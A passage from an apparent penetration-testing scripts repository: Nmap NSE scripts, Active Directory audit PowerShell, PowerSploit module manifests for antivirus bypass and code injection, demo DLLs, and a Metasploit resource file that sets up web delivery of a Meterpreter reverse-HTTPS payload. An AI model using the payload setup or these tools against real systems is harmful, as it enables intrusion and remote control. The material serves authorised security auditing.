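    -- Collect each e-mail address and build a unique index of them.
    -- A response without a body (e.g. a redirect) has nothing to scan.
    local body = r.response and r.response.body
    if body then
      for email in body:gmatch(EMAIL_PATTERN) do
        emails[email] = true
      end
    end
  end

  -- if no email addresses were collected abort.
  -- (A table is always truthy in Lua, so the original "not(emails)" test
  -- never fired and an empty result block was printed for every host.)
  if next(emails) == nil then return end

  local results = {}
  for email, _ in pairs(emails) do
    table.insert(results, email)
  end
  -- pairs() order is unspecified; sort so repeated scans diff cleanly.
  table.sort(results)

  results.name = crawler:getLimitations()

  return stdnse.format_output(true, results)
end
--------------------------------------------------------------------------------
/nse/http-screenshot.nse:
--------------------------------------------------------------------------------
-- This file is part of IVRE.
-- Copyright 2011 - 2016 Pierre LALET
--
-- IVRE is free software: you can redistribute it and/or modify it
-- under the terms of the GNU General Public License as published by
-- the Free Software Foundation, either version 3 of the License, or
-- (at your option) any later version.
--
-- IVRE is distributed in the hope that it will be useful, but WITHOUT
-- ANY WARRANTY; without even the implied warranty of MERCHANTABILITY
-- or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public
-- License for more details.
--
-- You should have received a copy of the GNU General Public License
-- along with IVRE. If not, see <http://www.gnu.org/licenses/>.

local shortport = require "shortport"
local string = require "string"
local stdnse = require "stdnse"

description = [[

Gets a screenshot from a Web service using a simple phantomjs script.

The script ivre-http-screenshot.js must be installed somewhere in
$PATH, as well as phantomjs.

Adapted from the http-screenshot script by SpiderLabs, that uses
wkhtmltoimage.

The output of the script is similar to the one from SpiderLabs, so
that both can be used with IVRE.

]]

author = "Pierre LALET"
license = "GPLv3"
categories = {"discovery", "safe", "screenshot"}

---
-- @usage
-- nmap -n -p 80 --script http-screenshot www.google.com
--
-- @args http-screenshot.vhost the vhost to use (default: use the
--       provided hostname or IP address)
-- @args http-screenshot.timeout timeout for the phantomjs script
--       (default: 300s)
--
-- @output
-- PORT   STATE SERVICE
-- 80/tcp open  http
-- |_http-screenshot: Saved to screenshot-173.194.45.82-www.google.com-80.jpg

portrule = shortport.http

-- Quote s for /bin/sh. Inside single quotes only the quote itself needs
-- escaping, done by closing, escaping and reopening ('\'').
local function sh_quote(s)
  return "'" .. (tostring(s):gsub("'", "'\\''")) .. "'"
end

-- Host name to put in the URL: the vhost script argument if given, else the
-- name the target was given as, else its address.
local function get_hostname(host)
  local arg = stdnse.get_script_args(SCRIPT_NAME .. '.vhost')
  return arg or host.targetname or host.ip
end

-- Run the phantomjs helper against the service and report the saved file.
action = function(host, port)
  local timeout = tonumber(stdnse.get_script_args(SCRIPT_NAME .. '.timeout')) or 300
  local ssl = port.version.service_tunnel == "ssl"
  local portnum = port.number
  local fname, strport
  local hostname = get_hostname(host)
  if hostname == host.ip then
    fname = string.format("screenshot-%s-%d.jpg", host.ip, portnum)
  else
    fname = string.format("screenshot-%s-%s-%d.jpg", host.ip, hostname, portnum)
  end
  -- Omit the port from the URL only when it is the scheme default.
  if (portnum == 80 and not ssl) or (portnum == 443 and ssl) then
    strport = ""
  else
    strport = string.format(":%d", portnum)
  end
  -- The URL and file name are shell-quoted: hostname comes from the target
  -- list or the --script-args vhost value and was previously interpolated
  -- into the command line unquoted, so any shell metacharacters in it were
  -- executed by os.execute's /bin/sh. The original also wrote "%d>/dev/null"
  -- with no space, which the shell parsed as a redirection of file
  -- descriptor <timeout> rather than passing the timeout argument at all.
  local url = string.format("%s://%s%s", ssl and "https" or "http", hostname, strport)
  os.execute(string.format("ivre-http-screenshot.js %s %s %d >/dev/null 2>&1",
                           sh_quote(url), sh_quote(fname), timeout))
  -- os.rename(f, f) is used as an existence test for the produced file.
  return (os.rename(fname, fname)
          and string.format("Saved to %s", fname)
          or "Failed")
end
--------------------------------------------------------------------------------
/nse/x11-screenshot.nse:
--------------------------------------------------------------------------------
-- This file is part of IVRE.
-- Copyright 2011 - 2016 Pierre LALET
--
-- IVRE is free software: you can redistribute it and/or modify it
-- under the terms of the GNU General Public License as published by
-- the Free Software Foundation, either version 3 of the License, or
-- (at your option) any later version.
--
-- IVRE is distributed in the hope that it will be useful, but WITHOUT
-- ANY WARRANTY; without even the implied warranty of MERCHANTABILITY
-- or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public
-- License for more details.
--
-- You should have received a copy of the GNU General Public License
-- along with IVRE. If not, see <http://www.gnu.org/licenses/>.

local stdnse = require "stdnse"

description = [[

Gets a screenshot from an X11 server using Imagemagick's `import`.

Imagemagick's `import` tool must be installed somewhere in $PATH.

The capture only succeeds when the server accepts the scanner's
connection without authentication (e.g. an open "xhost +" display);
it reads the full root window, which is a more intrusive action than
the "safe" category usually implies.

]]

author = "Pierre Lalet"
license = "GPLv3"
categories = {"discovery", "safe", "screenshot"}

---
-- @usage
-- nmap -n -p 6000 --script x11-screenshot 1.2.3.4
--
-- @args x11-screenshot.timeout timeout for the import process
--       (default: 600s)
--
-- @output
-- PORT     STATE SERVICE
-- 6000/tcp open  X11
-- |_x11-screenshot: Saved to screenshot-1.2.3.4-6000.jpg

-- Wrap cmd so that it is killed after `timeout` seconds: the command and a
-- sleep-then-kill watchdog run in the background; whichever finishes first
-- ends the other.
local function sh_timeout(cmd, timeout)
  return ("%s & CPID=${!}; (sleep %d; kill -9 ${CPID}) & SPID=${!}; wait ${CPID} 2>/dev/null; kill -9 ${SPID} 2>/dev/null"):format(cmd, timeout)
end


portrule = function(host, port)
  return (port.number >= 6000 and port.number <= 6019)
    or (port.service and port.service:match("^X11"))
end


-- Grab the root window of display <port - 6000> on host.ip into a jpg.
-- NOTE(review): the display number assumes the 6000+N convention; a port
-- matched only via the service name "X11" outside 6000-6019 yields an odd or
-- negative display, and an IPv6 host.ip makes "%s:%d" ambiguous for import.
action = function(host, port)
  local fname = ("screenshot-%s-%d.jpg"):format(host.ip, port.number)
  local timeout = tonumber(stdnse.get_script_args(SCRIPT_NAME .. '.timeout')) or 600
  os.execute(sh_timeout(("import -silent -window root -display %s:%d %s"):format(
    host.ip, port.number - 6000, fname), timeout))
  if os.rename(fname, fname) then
    return ("Saved to %s"):format(fname)
  end
end
--------------------------------------------------------------------------------
/powershell/AD_user_security_report.ps1:
--------------------------------------------------------------------------------
import-module activedirectory

# -Fragment emits only the <table>; the original produced a complete HTML
# document here and then nested it inside the second document built below.
$users = Get-ADUser -filter * -Properties * | Select SamAccountName,SurName,GivenName,Description,PasswordExpired,PasswordLastSet,AccountLockoutTime,AccountExpirationDate,LastLogonDate,@{name="MemberOf";expression={$_.memberof -join ";"}} | ConvertTo-Html -Fragment

# Report timestamp; $dated is referenced in the body below but was never assigned.
$dated = Get-Date

#HTML Heading
$htmlhead = @"

Active Directory User Security Audit Report


"@

#HTML Body for report
$htmlbody = @"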
17 | Active Directory User Security Audit Report
18 | User Audit Report
19 | $dated
20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 |
User Audit Security Report
$users
28 |
29 | 30 | "@ 31 | #Date for file name variable 32 | $fileDate = get-date -uformat %Y-%m-%d 33 | #Report output & location 34 | ConvertTo-HTML -head $htmlhead -body $htmlbody | Out-File ADUserSecurityAuditReport-$fileDate.html -------------------------------------------------------------------------------- /powershell/GPOReports.ps1: -------------------------------------------------------------------------------- 1 | #GPOReports.ps1 2 | #Create GPO reports 3 | #alan dot kaplan at va dot gov 4 | #6-10-2013 5 | 6 | Import-Module activedirectory 7 | [void][System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic') 8 | 9 | $domain = [Microsoft.VisualBasic.Interaction]::InputBox("Report GPOs in what domain?", "Domain", "$env:userdnsdomain") 10 | if ($domain.Length -eq 0) {Exit} 11 | 12 | $ReportPath = [Microsoft.VisualBasic.Interaction]::InputBox("Write reports to what path?", ` 13 | "Path", "$env:userprofile" +'\desktop\' + $domain + ' GPO Reports' ) 14 | if ($reportpath.Length -eq 0) {Exit} 15 | 16 | # if folder does not exist... 
17 | if (!(Test-Path $ReportPath)) { 18 | # create it 19 | [void](new-item $ReportPath -itemType directory) 20 | } 21 | 22 | 23 | $FilteredList = Get-GPO -All -Domain $domain ` 24 | |Select-Object -Property DisplayName,Owner, GPOStatus,ID ` 25 | |Out-GridView -OutputMode Multiple -Title "Wait for List, then select GPOs to report and click OK" 26 | 27 | #variation of code at 28 | #http://proproit.com/group-policy/the-simplest-way-to-get-group-policy-objects-reports/ 29 | #using 2.0 syntax 30 | 31 | $FilteredList | foreach ` 32 | { 33 | $Name = $_.DisplayName; 34 | Write-Host Writing GPO Report for $name to $reportpath\$name.html 35 | Get-GPOReport $_.id -ReportType HTML -Domain $domain -Path $reportpath\$name.html 36 | } 37 | -------------------------------------------------------------------------------- /powershell/Invoke-MetasploitPayload/LICENSE: -------------------------------------------------------------------------------- 1 | The MIT License (MIT) 2 | 3 | Copyright (c) 2016 Jared Haight 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /powershell/Invoke-MetasploitPayload/invoke-metasploitpayload.rc: -------------------------------------------------------------------------------- 1 | use exploit/multi/script/web_delivery 2 | set SRVHOST 0.0.0.0 3 | set SRVPORT 8443 4 | set SSL true 5 | set target 2 6 | set payload windows/meterpreter/reverse_https 7 | set LHOST 0.0.0.0 8 | set LPORT 443 9 | run -j -------------------------------------------------------------------------------- /powershell/Invoke-MetasploitPayload/web_delivery_screenshot.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/isaudits/scripts/9785abda7485c304c5ef452a8bf4068269d1d769/powershell/Invoke-MetasploitPayload/web_delivery_screenshot.png -------------------------------------------------------------------------------- /powershell/New-ADAssetReport.ps1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/isaudits/scripts/9785abda7485c304c5ef452a8bf4068269d1d769/powershell/New-ADAssetReport.ps1 -------------------------------------------------------------------------------- /powershell/PowerSploit/AntivirusBypass/AntivirusBypass.psd1: -------------------------------------------------------------------------------- 1 | @{ 2 | 3 | # Script module or binary module file associated with this manifest. 4 | ModuleToProcess = 'AntivirusBypass.psm1' 5 | 6 | # Version number of this module. 
7 | ModuleVersion = '3.0.0.0' 8 | 9 | # ID used to uniquely identify this module 10 | GUID = '7cf9de61-2bfc-41b4-a397-9d7cf3a8e66b' 11 | 12 | # Author of this module 13 | Author = 'Matthew Graeber' 14 | 15 | # Copyright statement for this module 16 | Copyright = 'BSD 3-Clause' 17 | 18 | # Description of the functionality provided by this module 19 | Description = 'PowerSploit Antivirus Avoidance/Bypass Module' 20 | 21 | # Minimum version of the Windows PowerShell engine required by this module 22 | PowerShellVersion = '2.0' 23 | 24 | # Functions to export from this module 25 | FunctionsToExport = '*' 26 | 27 | # List of all files packaged with this module 28 | FileList = 'AntivirusBypass.psm1', 'AntivirusBypass.psd1', 'Find-AVSignature.ps1', 'Usage.md' 29 | 30 | } 31 | -------------------------------------------------------------------------------- /powershell/PowerSploit/AntivirusBypass/AntivirusBypass.psm1: -------------------------------------------------------------------------------- 1 | Get-ChildItem (Join-Path $PSScriptRoot *.ps1) | % { . $_.FullName} 2 | -------------------------------------------------------------------------------- /powershell/PowerSploit/AntivirusBypass/Usage.md: -------------------------------------------------------------------------------- 1 | To install this module, drop the entire AntivirusBypass folder into one of your module directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable. 2 | 3 | The default per-user module path is: "$Env:HomeDrive$Env:HOMEPATH\Documents\WindowsPowerShell\Modules" 4 | The default computer-level module path is: "$Env:windir\System32\WindowsPowerShell\v1.0\Modules" 5 | 6 | To use the module, type `Import-Module AntivirusBypass` 7 | 8 | To see the commands imported, type `Get-Command -Module AntivirusBypass` 9 | 10 | For help on each individual command, Get-Help is your friend. 
11 | 12 | Note: The tools contained within this module were all designed such that they can be run individually. Including them in a module simply lends itself to increased portability. -------------------------------------------------------------------------------- /powershell/PowerSploit/CodeExecution/CodeExecution.psd1: -------------------------------------------------------------------------------- 1 | @{ 2 | 3 | # Script module or binary module file associated with this manifest. 4 | ModuleToProcess = 'CodeExecution.psm1' 5 | 6 | # Version number of this module. 7 | ModuleVersion = '3.0.0.0' 8 | 9 | # ID used to uniquely identify this module 10 | GUID = 'a8a6780b-e694-4aa4-b28d-646afa66733c' 11 | 12 | # Author of this module 13 | Author = 'Matthew Graeber' 14 | 15 | # Company or vendor of this module 16 | CompanyName = '' 17 | 18 | # Copyright statement for this module 19 | Copyright = 'BSD 3-Clause' 20 | 21 | # Description of the functionality provided by this module 22 | Description = 'PowerSploit Code Execution Module' 23 | 24 | # Minimum version of the Windows PowerShell engine required by this module 25 | PowerShellVersion = '2.0' 26 | 27 | # Functions to export from this module 28 | FunctionsToExport = '*' 29 | 30 | # List of all files packaged with this module 31 | FileList = 'CodeExecution.psm1', 'CodeExecution.psd1', 'Invoke-Shellcode.ps1', 'Invoke-DllInjection.ps1', 32 | 'Invoke-ReflectivePEInjection.ps1', 'Invoke-WmiCommand.ps1', 'Usage.md' 33 | } 34 | -------------------------------------------------------------------------------- /powershell/PowerSploit/CodeExecution/CodeExecution.psm1: -------------------------------------------------------------------------------- 1 | Get-ChildItem (Join-Path $PSScriptRoot *.ps1) | % { . 
$_.FullName} 2 | -------------------------------------------------------------------------------- /powershell/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 11.00 3 | # Visual Studio 2010 4 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "DemoDLL", "DemoDLL\DemoDLL.vcxproj", "{F4F1D8EF-4069-40F3-9AAB-F75BAD26CBBA}" 5 | EndProject 6 | Global 7 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 8 | Debug|Win32 = Debug|Win32 9 | Debug|x64 = Debug|x64 10 | Release|Win32 = Release|Win32 11 | Release|x64 = Release|x64 12 | EndGlobalSection 13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 14 | {F4F1D8EF-4069-40F3-9AAB-F75BAD26CBBA}.Debug|Win32.ActiveCfg = Debug|Win32 15 | {F4F1D8EF-4069-40F3-9AAB-F75BAD26CBBA}.Debug|Win32.Build.0 = Debug|Win32 16 | {F4F1D8EF-4069-40F3-9AAB-F75BAD26CBBA}.Debug|x64.ActiveCfg = Debug|x64 17 | {F4F1D8EF-4069-40F3-9AAB-F75BAD26CBBA}.Debug|x64.Build.0 = Debug|x64 18 | {F4F1D8EF-4069-40F3-9AAB-F75BAD26CBBA}.Release|Win32.ActiveCfg = Release|Win32 19 | {F4F1D8EF-4069-40F3-9AAB-F75BAD26CBBA}.Release|Win32.Build.0 = Release|Win32 20 | {F4F1D8EF-4069-40F3-9AAB-F75BAD26CBBA}.Release|x64.ActiveCfg = Release|x64 21 | {F4F1D8EF-4069-40F3-9AAB-F75BAD26CBBA}.Release|x64.Build.0 = Release|x64 22 | EndGlobalSection 23 | GlobalSection(SolutionProperties) = preSolution 24 | HideSolutionNode = FALSE 25 | EndGlobalSection 26 | EndGlobal 27 | -------------------------------------------------------------------------------- /powershell/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL/DemoDLL.cpp: -------------------------------------------------------------------------------- 1 | // DemoDLL.cpp : Defines the exported functions for the DLL application. 
2 | // 3 | 4 | #include "stdafx.h" 5 | #include "DemoDLL.h" 6 | 7 | using namespace std; 8 | 9 | 10 | extern "C" __declspec( dllexport ) char* StringFunc() 11 | { 12 | ostream *outputStream = NULL; 13 | 14 | //If you want to output to cout, simply set outputStream to &cout. This allows you to write a program that can switch between outputting to string or to cout. 15 | //outputStream = &cout; 16 | 17 | ostringstream *stringStream = new ostringstream(); 18 | outputStream = stringStream; 19 | 20 | (*outputStream) << "String DLL function is working" << endl << endl; 21 | 22 | string output = (*stringStream).str(); 23 | const char* outputStr = output.c_str(); 24 | 25 | char* out = new char[output.size()+1]; 26 | strcpy(out, outputStr); 27 | out[output.size()] = '\0'; 28 | 29 | 30 | return out; 31 | } 32 | 33 | extern "C" __declspec( dllexport ) void VoidFunc() 34 | { 35 | printf("Void DLL function is working, using printf to display. You will only see this if you run locally.\n\n"); 36 | return; 37 | } 38 | 39 | extern "C" __declspec( dllexport ) wchar_t* WStringFunc() 40 | { 41 | wostream *outputStream = NULL; 42 | 43 | //If you want to output to wcout, simply set outputStream to &cout. This allows you to write a program that can switch between outputting to wstring or to wcout. 
44 | outputStream = &wcout; 45 | 46 | wostringstream *stringStream = new wostringstream(); 47 | outputStream = stringStream; 48 | 49 | (*outputStream) << L"WString DLL function is working" << endl << endl; 50 | 51 | wstring output = (*stringStream).str(); 52 | const wchar_t* outputStr = output.c_str(); 53 | 54 | wchar_t* out = new wchar_t[output.size()+1]; 55 | wcscpy(out, outputStr); 56 | out[output.size()] = '\0'; 57 | 58 | 59 | return out; 60 | } -------------------------------------------------------------------------------- /powershell/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL/DemoDLL.h: -------------------------------------------------------------------------------- 1 | // The following ifdef block is the standard way of creating macros which make exporting 2 | // from a DLL simpler. All files within this DLL are compiled with the DEMODLL_EXPORTS 3 | // symbol defined on the command line. This symbol should not be defined on any project 4 | // that uses this DLL. This way any other project whose source files include this file see 5 | // DEMODLL_API functions as being imported from a DLL, whereas this DLL sees symbols 6 | // defined with this macro as being exported. 
7 | #ifdef DEMODLL_EXPORTS 8 | #define DEMODLL_API __declspec(dllexport) 9 | #else 10 | #define DEMODLL_API __declspec(dllimport) 11 | #endif 12 | 13 | using namespace std; 14 | 15 | extern "C" __declspec( dllexport ) char* StringFunc(); 16 | extern "C" __declspec( dllexport ) void VoidFunc(); 17 | extern "C" __declspec( dllexport ) wchar_t* WStringFunc(); -------------------------------------------------------------------------------- /powershell/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL/DemoDLL.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | Header Files 23 | 24 | 25 | Header Files 26 | 27 | 28 | Header Files 29 | 30 | 31 | 32 | 33 | Source Files 34 | 35 | 36 | Source Files 37 | 38 | 39 | Source Files 40 | 41 | 42 | -------------------------------------------------------------------------------- /powershell/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL/ReadMe.txt: -------------------------------------------------------------------------------- 1 | ======================================================================== 2 | DYNAMIC LINK LIBRARY : DemoDLL Project Overview 3 | ======================================================================== 4 | 5 | AppWizard has created this DemoDLL DLL for you. 6 | 7 | This file contains a summary of what you will find in each of the files that 8 | make up your DemoDLL application. 9 | 10 | 11 | DemoDLL.vcxproj 12 | This is the main project file for VC++ projects generated using an Application Wizard. 
13 | It contains information about the version of Visual C++ that generated the file, and 14 | information about the platforms, configurations, and project features selected with the 15 | Application Wizard. 16 | 17 | DemoDLL.vcxproj.filters 18 | This is the filters file for VC++ projects generated using an Application Wizard. 19 | It contains information about the association between the files in your project 20 | and the filters. This association is used in the IDE to show grouping of files with 21 | similar extensions under a specific node (for e.g. ".cpp" files are associated with the 22 | "Source Files" filter). 23 | 24 | DemoDLL.cpp 25 | This is the main DLL source file. 26 | 27 | ///////////////////////////////////////////////////////////////////////////// 28 | Other standard files: 29 | 30 | StdAfx.h, StdAfx.cpp 31 | These files are used to build a precompiled header (PCH) file 32 | named DemoDLL.pch and a precompiled types file named StdAfx.obj. 33 | 34 | ///////////////////////////////////////////////////////////////////////////// 35 | Other notes: 36 | 37 | AppWizard uses "TODO:" comments to indicate parts of the source code you 38 | should add to or customize. 39 | 40 | ///////////////////////////////////////////////////////////////////////////// 41 | -------------------------------------------------------------------------------- /powershell/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL/dllmain.cpp: -------------------------------------------------------------------------------- 1 | // dllmain.cpp : Defines the entry point for the DLL application. 
2 | #include "stdafx.h" 3 | 4 | BOOL APIENTRY DllMain( HMODULE hModule, 5 | DWORD ul_reason_for_call, 6 | LPVOID lpReserved 7 | ) 8 | { 9 | switch (ul_reason_for_call) 10 | { 11 | case DLL_PROCESS_ATTACH: 12 | case DLL_THREAD_ATTACH: 13 | case DLL_THREAD_DETACH: 14 | case DLL_PROCESS_DETACH: 15 | break; 16 | } 17 | return TRUE; 18 | } 19 | 20 | -------------------------------------------------------------------------------- /powershell/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL/stdafx.cpp: -------------------------------------------------------------------------------- 1 | // stdafx.cpp : source file that includes just the standard includes 2 | // DemoDLL.pch will be the pre-compiled header 3 | // stdafx.obj will contain the pre-compiled type information 4 | 5 | #include "stdafx.h" 6 | 7 | // TODO: reference any additional headers you need in STDAFX.H 8 | // and not in this file 9 | -------------------------------------------------------------------------------- /powershell/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL/stdafx.h: -------------------------------------------------------------------------------- 1 | // stdafx.h : include file for standard system include files, 2 | // or project specific include files that are used frequently, but 3 | // are changed infrequently 4 | // 5 | 6 | #pragma once 7 | 8 | #include "targetver.h" 9 | 10 | #define WIN32_LEAN_AND_MEAN // Exclude rarely-used stuff from Windows headers 11 | // Windows Header Files: 12 | #include 13 | #include 14 | #include 15 | #include 16 | #include 17 | 18 | 19 | 20 | // TODO: reference additional headers your program requires here 21 | -------------------------------------------------------------------------------- /powershell/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL/targetver.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | // 
Including SDKDDKVer.h defines the highest available Windows platform. 4 | 5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and 6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h. 7 | 8 | #include 9 | -------------------------------------------------------------------------------- /powershell/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio 2012 4 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "DemoDLL_RemoteProcess", "DemoDLL_RemoteProcess\DemoDLL_RemoteProcess.vcxproj", "{3C031A7E-A99B-465E-ADF0-1350A94F1F5D}" 5 | EndProject 6 | Global 7 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 8 | Debug|Win32 = Debug|Win32 9 | Debug|x64 = Debug|x64 10 | Release|Win32 = Release|Win32 11 | Release|x64 = Release|x64 12 | EndGlobalSection 13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 14 | {3C031A7E-A99B-465E-ADF0-1350A94F1F5D}.Debug|Win32.ActiveCfg = Debug|Win32 15 | {3C031A7E-A99B-465E-ADF0-1350A94F1F5D}.Debug|Win32.Build.0 = Debug|Win32 16 | {3C031A7E-A99B-465E-ADF0-1350A94F1F5D}.Debug|x64.ActiveCfg = Debug|x64 17 | {3C031A7E-A99B-465E-ADF0-1350A94F1F5D}.Debug|x64.Build.0 = Debug|x64 18 | {3C031A7E-A99B-465E-ADF0-1350A94F1F5D}.Release|Win32.ActiveCfg = Release|Win32 19 | {3C031A7E-A99B-465E-ADF0-1350A94F1F5D}.Release|Win32.Build.0 = Release|Win32 20 | {3C031A7E-A99B-465E-ADF0-1350A94F1F5D}.Release|x64.ActiveCfg = Release|x64 21 | {3C031A7E-A99B-465E-ADF0-1350A94F1F5D}.Release|x64.Build.0 = Release|x64 22 | EndGlobalSection 23 | GlobalSection(SolutionProperties) = preSolution 24 | HideSolutionNode = FALSE 25 | EndGlobalSection 26 | EndGlobal 27 | 
-------------------------------------------------------------------------------- /powershell/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess.cpp: -------------------------------------------------------------------------------- 1 | // DemoDLL_RemoteProcess.cpp : Defines the exported functions for the DLL application. 2 | // 3 | 4 | #include "stdafx.h" 5 | 6 | using namespace std; 7 | 8 | extern "C" __declspec( dllexport ) void VoidFunc(); 9 | 10 | 11 | extern "C" __declspec( dllexport ) void VoidFunc() 12 | { 13 | ofstream myfile; 14 | _mkdir("c:\\ReflectiveLoaderTest"); 15 | myfile.open ("c:\\ReflectiveLoaderTest\\DllVoidFunction.txt"); 16 | myfile << "Dll Void function successfully called.\n"; 17 | myfile.close(); 18 | return; 19 | } -------------------------------------------------------------------------------- /powershell/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | Header Files 23 | 24 | 25 | Header Files 26 | 27 | 28 | 29 | 30 | Source Files 31 | 32 | 33 | Source Files 34 | 35 | 36 | Source Files 37 | 38 | 39 | -------------------------------------------------------------------------------- /powershell/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess/ReadMe.txt: -------------------------------------------------------------------------------- 1 | 
======================================================================== 2 | DYNAMIC LINK LIBRARY : DemoDLL_RemoteProcess Project Overview 3 | ======================================================================== 4 | 5 | AppWizard has created this DemoDLL_RemoteProcess DLL for you. 6 | 7 | This file contains a summary of what you will find in each of the files that 8 | make up your DemoDLL_RemoteProcess application. 9 | 10 | 11 | DemoDLL_RemoteProcess.vcxproj 12 | This is the main project file for VC++ projects generated using an Application Wizard. 13 | It contains information about the version of Visual C++ that generated the file, and 14 | information about the platforms, configurations, and project features selected with the 15 | Application Wizard. 16 | 17 | DemoDLL_RemoteProcess.vcxproj.filters 18 | This is the filters file for VC++ projects generated using an Application Wizard. 19 | It contains information about the association between the files in your project 20 | and the filters. This association is used in the IDE to show grouping of files with 21 | similar extensions under a specific node (for e.g. ".cpp" files are associated with the 22 | "Source Files" filter). 23 | 24 | DemoDLL_RemoteProcess.cpp 25 | This is the main DLL source file. 26 | 27 | When created, this DLL does not export any symbols. As a result, it 28 | will not produce a .lib file when it is built. If you wish this project 29 | to be a project dependency of some other project, you will either need to 30 | add code to export some symbols from the DLL so that an export library 31 | will be produced, or you can set the Ignore Input Library property to Yes 32 | on the General propert page of the Linker folder in the project's Property 33 | Pages dialog box. 
34 | 35 | ///////////////////////////////////////////////////////////////////////////// 36 | Other standard files: 37 | 38 | StdAfx.h, StdAfx.cpp 39 | These files are used to build a precompiled header (PCH) file 40 | named DemoDLL_RemoteProcess.pch and a precompiled types file named StdAfx.obj. 41 | 42 | ///////////////////////////////////////////////////////////////////////////// 43 | Other notes: 44 | 45 | AppWizard uses "TODO:" comments to indicate parts of the source code you 46 | should add to or customize. 47 | 48 | ///////////////////////////////////////////////////////////////////////////// 49 | -------------------------------------------------------------------------------- /powershell/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess/dllmain.cpp: -------------------------------------------------------------------------------- 1 | // dllmain.cpp : Defines the entry point for the DLL application. 2 | #include "stdafx.h" 3 | 4 | using namespace std; 5 | 6 | BOOL APIENTRY DllMain( HMODULE hModule, 7 | DWORD ul_reason_for_call, 8 | LPVOID lpReserved 9 | ) 10 | { 11 | ofstream myfile; 12 | 13 | switch (ul_reason_for_call) 14 | { 15 | case DLL_PROCESS_ATTACH: 16 | _mkdir("c:\\ReflectiveLoaderTest"); 17 | myfile.open ("c:\\ReflectiveLoaderTest\\DllMain.txt"); 18 | myfile << "DllMain successfully called.\n"; 19 | myfile.close(); 20 | break; 21 | case 